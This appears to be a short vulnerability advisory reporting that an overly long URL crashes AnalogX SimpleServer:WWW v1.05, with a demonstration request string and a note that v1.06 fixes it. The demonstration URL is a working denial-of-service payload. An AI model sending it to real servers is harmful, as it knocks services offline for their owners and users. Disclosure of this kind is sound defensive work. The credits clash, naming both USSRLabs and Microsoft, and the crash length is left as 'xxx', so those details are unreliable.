AnalogX SimpleServer:WWW Denial of Service

 
AnalogX SimpleServer:WWW Denial of Service
Reported June 15 by
USSRLabs

VERSIONS EFFECTED
Analog SimpleServer:WWW v1.05

DESCRIPTION

A denial of service condition exists in AnalogX SimpleServer:WWW that is caused by a long URL. By sending the Web service a malformed URL with xxx characters the service can be made to crash.

DEMONSTRATION

http://serverip/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

VENDOR RESPONSE

The vendor is aware of the problem and has released a new version 1.06 that eliminates the problem.

CREDITS
Discovered and reported by Microsoft

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish